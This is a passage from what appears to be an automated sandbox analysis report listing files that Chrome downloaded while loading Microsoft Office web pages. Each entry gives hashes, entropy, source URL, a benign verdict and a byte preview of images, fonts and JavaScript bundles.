                                                                                        SHA-512:9E35EBDE9BBC942B2F1ECDD7A700D2822B651EC1682B27BB14936A683A5E7288D6F151B3299B2D423B2A2526516519991B7F967F1A466936E91EDAB4CAC13F8B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-4-mreb-708bcc570a.png
                                                                                        Preview:.PNG........IHDR...F...........!.....pHYs.........&.:4....sRGB.........gAMA......a...w.IDATx.....$.Y.....O....l..]..*.d...d...X`0.^....{...\s...K...m0..m0`2.e..]m........t.t..}...{...l.vv..nMwW..>U.....=..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 10544, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):10544
                                                                                        Entropy (8bit):7.978818164372222
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:zdZObGyIhlCLlNHSmMalbqw/37PfF1pLNdEVSVJbb/3yw142gIn:RZO6yUUzHSmH1qwzXvxNSsLD3yMgI
                                                                                        MD5:8E160632C48AD1E3D0E9F4334636086B
                                                                                        SHA1:7BA2921499B2264DEE14F95801BFBCF416861D7C
                                                                                        SHA-256:57FEBFBAD63B722A38BC668E67BC7C2DC02ECA221F26DB3A9303C1BD584A1A42
                                                                                        SHA-512:943E0BAB3A26AA73AB7F45636DCE32F435BC6651D3FE9F94DC8EE37FF2291A191A9F9276603C3B760EB734388C2388F06A8331FADF85025CB92687D3E86D24DE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_light.woff2
                                                                                        Preview:wOF2......)0......R ..(.........................?FFTM..&..... .`..z......T.:.....6.$.... ..^..e..D%......,...QI*8.aB'-...Kn..5..O.&..e....P.(#4.w7|........=*wD..........}.*k..1.8.._..^.Y.........m..h.;.2.....wx...}......>.}..AD.....H.R....=|....[..#..........5"b.h..X#v.RcV.awR.K..kul..9.jI"m..A .i.%....=.....o..W..75H...h8".........k{....?.i.H...Hvt.%.V..#.l).*...s...ly.-5...R.+-..7..[.....D..Z...l6...Yv.#....#.Ft...c.TJ.._..U{.WB..:..........E.D.....5.y......ED..d......!......d.ArR@...s:w....t........)....Kv.x*.h....7.-[a..2l.{:.<u.V...:.......[.F2...ZV.N.....j..W....T\Z....@....y.i.|.....p......] ,..`,.t....LDAB...hs#..w.( i..l.g......U.#@n..N.8.O`l.@r..X.......S.o.._`..1z..VVt.;U&B"&.|."'...4..rL.QV..5.1i.G..Y....A..N]...o..iH...D.[......!.p.9^...!...nu....2..D....`.Xc.%vNA.V.Y...B...-..pU.J..(.)...42b%.$.t..u.....J... {........)9y.E.].^..Y.C7..Y....U....`q.".W.n6......a...tjc........,...a..h..b...|Y..Ya.........m..../..hA.2.Z0.....U.4.....3A..-.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1059 x 736, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):421343
                                                                                        Entropy (8bit):7.9930283068921435
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:CzhXKcW0EjM7MmgItOOh5SdW8fgmAGbvEG:Czh6tI7MmqA5OW8fgfGbvT
                                                                                        MD5:5EEEC8E6F540AAC271BB6D8BD113115A
                                                                                        SHA1:B3256E64A78DD1A5CF6173ED958F69BC09E7E885
                                                                                        SHA-256:434138E6620D458BEC6FB1F53DF26AAF6F57B4FDBDF14ED2EA03EDDF642A156A
                                                                                        SHA-512:6D464624DA20CCE660174494492E14593E3A6765C4D01C223F68C38999BC83EF70E8E1BFD374EAE33295927C1B6A28F69716BBDA20591B2C31AE39C8F4EF7A49
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-edu-2-mreb-5eeec8e6f5.png
                                                                                        Preview:.PNG........IHDR...#................pHYs.........&.:4....sRGB.........gAMA......a...mtIDATx...[..q..w..y.o.=..Y3...[V..(.v.;R..m......cN....NU@q.....*.....*...@QI.(.!P.sp..%.$.f.....Y........D....Z..}.{x......>,.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z...$.E..}5....-Z.h.E..N.Z....h.F..^.I{...b.._._~}....}.^}...?.o...U>?|...W..w/|=..|..}...g......./...x.s......=..~..........g.Q<.....}...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1600 x 1173, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):147977
                                                                                        Entropy (8bit):7.894319832540058
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:ZQZdW2222222222222222222222222222228VOS0dxbxqJPRVcHivXT48tZaLoN8:ZUDVOZdxcWizPaecE7JxIOyPiQwv0
                                                                                        MD5:A5E0395B6BE3507BAFB8EE7A942BD44E
                                                                                        SHA1:57FB2F3618A33A34BF2F289EC597C478A41D90E6
                                                                                        SHA-256:4E5CD37C0BECC3183B5D8C11DBE03351F98BE082EE5D75702303BD2D14EF0A63
                                                                                        SHA-512:E87C920DED3D84EE3F9046D666479CCCD8FB8888A0A5D8047A9CACD07E63BCECC4FE8CBBBD32FC5736CCAEC13C3D21F96E29FD72230B1E97BD0F166E24B4E6F0
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...@.........{..E....sBIT.....O.....zTXtRaw profile type APP1....U.K..0.D.>E.0.X..S........r..2..1....>.>....x.........b..!PO.Y.H.Z.......qabTb.,..G.@8.j.'...O.R....d.Ia....j[.....,.d.... .IDATx...wx.W...s..nuK.e.....B.!$...M.%...v.~,u!.@X ..%.l.....S..^.&.z..n....C..U........<....33W.3.................S.........X....................................................................................................................................................................................................................................................................S..R.Tw......)H)Ou...L..X..')%........`..../..0A..X..........d..AU..6...,`.)..^y.DD.....x..r.......S.`..(j.m&..j.....Nw..]....1..z.X'6..q...D")..m'm[.,......MJ).4..<...i.+.....^....&o0.X....u.......B8.........p....4.6....^..4.)...a.M.....]M..u.D"!....J.h.ql'..{{c..}.i .t...\...d..m.V.K......8.)a.Zv.gF..jv....b.2..|.ey....Fc.a..I....b.S.S..YJ).u].M&..P.uUW...t...z..j{].m.04).
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1094 x 761, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):489526
                                                                                        Entropy (8bit):7.995720041871589
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:aKimPYeigxfUPOwwMSavIHHukSrlKdZmzrC41zbxJa9ZqHqqzM0pZAyeRLqtt3LP:aKPFyOziIHOEgz2izjDANRLsl+4H7
                                                                                        MD5:708BCC570AD4887E2C1854014B472FC0
                                                                                        SHA1:768539D7A0EF0061097FF3AE0895EE437D543A13
                                                                                        SHA-256:88A8CE64B7B33A367FC73338F5E319B3546DD782E0336CCA07D00A54B5C51DA0
                                                                                        SHA-512:9E35EBDE9BBC942B2F1ECDD7A700D2822B651EC1682B27BB14936A683A5E7288D6F151B3299B2D423B2A2526516519991B7F967F1A466936E91EDAB4CAC13F8B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...F...........!.....pHYs.........&.:4....sRGB.........gAMA......a...w.IDATx.....$.Y.....O....l..]..*.d...d...X`0.^....{...\s...K...m0..m0`2.e..]m........t.t..}...{...l.vv..nMwW..>U.....=..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (42133)
                                                                                        Category:downloaded
                                                                                        Size (bytes):138268
                                                                                        Entropy (8bit):5.224497765711851
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                        MD5:5B85413B96AF340238B93068CDB641FB
                                                                                        SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                        SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                        SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                                        Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (30221)
                                                                                        Category:downloaded
                                                                                        Size (bytes):30273
                                                                                        Entropy (8bit):5.26135621409318
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:42W2n0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:4XM0S0/ks2JdImYFcw662A86vzyR
                                                                                        MD5:9A3D03748259F75C7FCB9FF38217188B
                                                                                        SHA1:603E40F5EDF8A9F9776ABAF40608D8188F14AA43
                                                                                        SHA-256:85ED62025446CE50B8DB01DBE45485596DB9B9DB6A305BFA3E86AD8EA7305214
                                                                                        SHA-512:B2E7463DC490BB22FD4CAC06555B54DC844CD20B84B18618CA207689435B7FADA1E85BFABC725863E5E8FB4C1F7BD3EF082E7780DF1BAF1955759209E621284F
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://mem.gfx.ms/meversion?partner=office&market=en-us&uhf=1
                                                                                        Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":false,"graphinfo":{"graphclientid":null,"graphscope":null,"graphcodeurl":null,"graphredirecturi":null,"graphphotourl":null},"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/","authAppUpsell
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2500 x 828, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):1568713
                                                                                        Entropy (8bit):7.994353727710284
                                                                                        Encrypted:true
                                                                                        SSDEEP:24576:+SlEJttUZ+N7R8NrWZaF2sTAHPapdyjLLb7pFhO0+juu1nwdYAfnJ:+Qw8IcrSawsTMjLTpPj
                                                                                        MD5:7BF078A5F39C15673178E3C77EBDFBCE
                                                                                        SHA1:3FEAC213FCA05D4811FA705C60D726F5DC81B06D
                                                                                        SHA-256:7C5FBD491C8E2916ACDB0955EC27F21E6C933860B33626FD1DED5486816BDD35
                                                                                        SHA-512:CD621836F8420630E1A1A1B0F5BACDBFACB6C3FAC6CD9F93CF0500C5F3C05B8485C7CF0AF9CCE3F5025399FCC718EB0C8318C4E28174742D920D50022490FECE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/m365-rebrand-value-edu-mreb-7bf078a5f3.png
                                                                                        Preview:.PNG........IHDR.......<.....s.1.....pHYs.................sRGB.........gAMA......a....^IDATx...Y.%Iz....1.i...s........@.8..}(RF3]Qf}...f4.Q...?A7.L...tA...e..%..I:.....Q...Du.9.yXcD....=.#..U...Px...k..<<<<<v.....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (42133)
                                                                                        Category:dropped
                                                                                        Size (bytes):138268
                                                                                        Entropy (8bit):5.224497765711851
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                        MD5:5B85413B96AF340238B93068CDB641FB
                                                                                        SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                        SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                        SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                        Category:downloaded
                                                                                        Size (bytes):15406
                                                                                        Entropy (8bit):4.967552114438246
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:2xApRWtvbsjgIYYQlV47U/1z8QsCj99/R1qa/PRZs6M75m4vU6GCi28urvZQYH3:FRIwcVeq8wjjLENG72tl
                                                                                        MD5:31D62B976C16DB52CBF0D5631BCDE62C
                                                                                        SHA1:18F2D0B838D766B642E787E222075DDFF5285662
                                                                                        SHA-256:04663FB0B01FC27B402519F0B000DB2B98EF3754C8C99C21E304262D2353AB62
                                                                                        SHA-512:104E20B3977B6ADAF6847D62199656A4E93CA3478D78335DBA65B807C4375E8AA3FB41BD12B3EA0CF11C689C21BC1486DA063415372F4AD090D95DC2517880E1
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/favicon_m365-31d62b976c.ico
                                                                                        Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ....................................................o..o.z.................................................v.........{...u.v.m.................................O.................y...r...l..g.O.................x...n!..c...a/..............w...o...h...c..._...Zx..........z9..v-..q!..h...^...b:..~.......t...j...c...^...Z}..Wz..........zH..zE..y<..u...o!..f..W.a.|.a.n..c...\...Xy..Uv..Tq..........zS..{T..{T..{Q..yG..v...........d...Y{.Tu..Po..Kh..t\..........{`..|b..|e..|i..|n..................Mk..If..C]..lS...P..........{l..|p..|u..}}..}.z.................C^z.ST..O...O...O..........}x..}|..}...}...mw..I7...........N..L...M...M...N...N..........}...}...}...~...ag..\9..xC..G..I..K...K...L...M...N..........}...}...~...~...ak..^:..{C..F..H..I..K..K...L...M..........x...}...~.......bl.._;..|C..F...G..I..J..K..K...K..................~.O....gt..a;..}C..F..G..H..I..JO......................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1598 x 899, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):1236532
                                                                                        Entropy (8bit):7.99453807364983
                                                                                        Encrypted:true
                                                                                        SSDEEP:24576:3IR94Q7f3YaeokAGfdoICPLOHpob3i8/eCsjNKSOyP82Rx7BiVQFMqna:3IR9hz3OyedoZyHpyzer023BieKqa
                                                                                        MD5:EAFC3935A3559F15248B9409658D978F
                                                                                        SHA1:46242446924C4DB9208646689119EFACFF1C93FD
                                                                                        SHA-256:B38F5C1FD010828E2DFC90300D3C2AB93DF49CF75C758BBBFF6B0A987D64C448
                                                                                        SHA-512:A1F345BFA3D85C7436E5F8EC6DA3147779BC903B6E59B24732C1302AEE8366B6E60D5F3281022485E4580B22D440AF80798010E06B0E2639BEB0DBE357347B7E
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-3-mreb-eafc3935a3.png
                                                                                        Preview:.PNG........IHDR...>...........x1....pHYs.................sRGB.........gAMA......a.....IDATx...W.m....1W^;.|.n..n.K...&...).Y.(.l.....a....~1l.O._...~4.`..m..!AjB.(..@R......7T<g..g...XkW..'V........s......WU .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..D................o'bl...@ .....@ .....@ .....@ ......M....E.E<'}...r.g..Z...Ws..1.^.~.m.S_..*e..{...x.c..4/....x.{|..gA...s.g.S/.,.2..,.....UAD1...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..../..$-..g...."..#.....*.#.B|.5.......2........Y..M..bL=...R.g.7y.{U....q...........>.....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ......B...|].}.HO.....Y.,.x......C.....m.j.#.!....{|.=...S.{<.^.=.km.e.|Y.H...g}'......<..Mc.E..w..J..*.w....@ .....@ .....@ .....@ .....*...E...z..o..._MD.......Q..W.....@ .....@ .....@ .....@ ...^.B/......~.|].._v.g
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (32000)
                                                                                        Category:downloaded
                                                                                        Size (bytes):149053
                                                                                        Entropy (8bit):5.440876470211605
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:ueeUcMiWa1y6FIwee1fw5hXmk9fVyIRiaO0TnNUrt:feUB8UOf0hX/9YaBTnyrt
                                                                                        MD5:95F2F0FC50065B017596646C65E90D3E
                                                                                        SHA1:900566D546C121942D1964250FE4D3CEC23ADF3D
                                                                                        SHA-256:898F9F6B7CF9D9E797BB187001FCEDEB9999F912C9DC1A2CF5ABD30D961CC69D
                                                                                        SHA-512:9EF614ABB368F3291A22264287F7A7C7A8217CCEF71BA46E624C8B385D49AA8A9B13C7FEEE5338CAB632D3B1493864E7EE46A3D988F2437B5C66CBA65A5F395F
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/bundles/unauth-95f2f0fc50.js
                                                                                        Preview:var __awaiter=this&&this.__awaiter||function(e,t,n,i){function r(e){return e instanceof n?e:new n(function(t){t(e)})}return new(n||(n=Promise))(function(n,a){function o(e){try{u(i.next(e))}catch(e){a(e)}}function c(e){try{u(i.throw(e))}catch(e){a(e)}}function u(e){e.done?n(e.value):r(e.value).then(o,c)}u((i=i.apply(e,t||[])).next())})},__generator=this&&this.__generator||function(e,t){function n(e){return function(t){return i([e,t])}}function i(n){if(r)throw new TypeError("Generator is already executing.");for(;c&&(c=0,n[0]&&(u=0)),u;)try{if(r=1,a&&(o=2&n[0]?a.return:n[0]?a.throw||((o=a.return)&&o.call(a),0):a.next)&&!(o=o.call(a,n[1])).done)return o;switch(a=0,o&&(n=[2&n[0],o.value]),n[0]){case 0:case 1:o=n;break;case 4:return u.label++,{value:n[1],done:!1};case 5:u.label++,a=n[1],n=[0];continue;case 7:n=u.ops.pop(),u.trys.pop();continue;default:if(o=u.trys,!(o=o.length>0&&o[o.length-1])&&(6===n[0]||2===n[0])){u=0;continue}if(3===n[0]&&(!o||n[1]>o[0]&&n[1]<o[3])){u.label=n[1];break}if
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 11100, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):11100
                                                                                        Entropy (8bit):7.981314257601996
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:uW6VIH/eJH8zI33ipXWVgfDPbyVvDUOSkWJxRhCaev7eZYxrPEsDtPM95E:UVIHmV8XXcgfDVJkgwaev7LP3pPM95E
                                                                                        MD5:906BA74C1F7A4FD42174E0F58FAD3C95
                                                                                        SHA1:3631818302580F0E0DA3ED54E8488CE72B1D4B11
                                                                                        SHA-256:BB232FD09A6696CE21EC10A43B89933E12AD866DFDE30A4A6A08E08082E6557D
                                                                                        SHA-512:287E1F5EB314302ED3D78D17516D9105DEAF5AE325C3CDAA1298BAB455C187022B53643A88BB9A64074707A1E19392B12F7BCAC6601EB0FDE66DBE7FB19C2E6D
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                                                                                        Preview:wOF2......+\......V...*.........................?FFTM..&..... .`..z......X.......6.$.... ..@..r..I....n.!$.;S...H.._<............AS1A......ne.]'.....{?..XV..x....R,....V.4..S ...r...._.rg1.5:..........OrI........j.0...........y.B7..........6..S.......6*.1F.F.....=`...q.ti.(.}'r..g...!5C4y/.*.....m:....&X..jl...;.+yVD...h.$.....d.....93.VhFv......lg......A..CFC.o..?..K.W.X..W.......Bf.`...s.a47...~)...ScE$.@.<...M.....T......4..2...7...y.......h.....N$DB.?_.../...|..f.jd"b.;%....R..m...#.e.5UI...B..........H...Iw...V{..q..K..C...0..W.....3}..U..].....".8#2.;(...O....*f4e.5....cb....Ro..b..!.....=p...._.7w..'~.'.>Y.....bQG!............!.<~.....A..9!LG._..>@.D?s..3......Q...5?iH.8t.v..A.....u.......l..=.'tRL.Y,W..R:..~.].4I.t....%.2z}...Z_./................J.....9jG..j#..,B.3*.5a.`.......W..^....8.n. ...&,1.......F.C(.YI..-1w(5.6..5...>..].g.K.x.......ZL[./..dwP)t.|I/.h.T\BR.n.i|P..eL.L_.+.C..........$...t...O_~....~.i..A.,...={q...^..F.Z.7.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                        Category:downloaded
                                                                                        Size (bytes):89501
                                                                                        Entropy (8bit):5.289893677458563
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
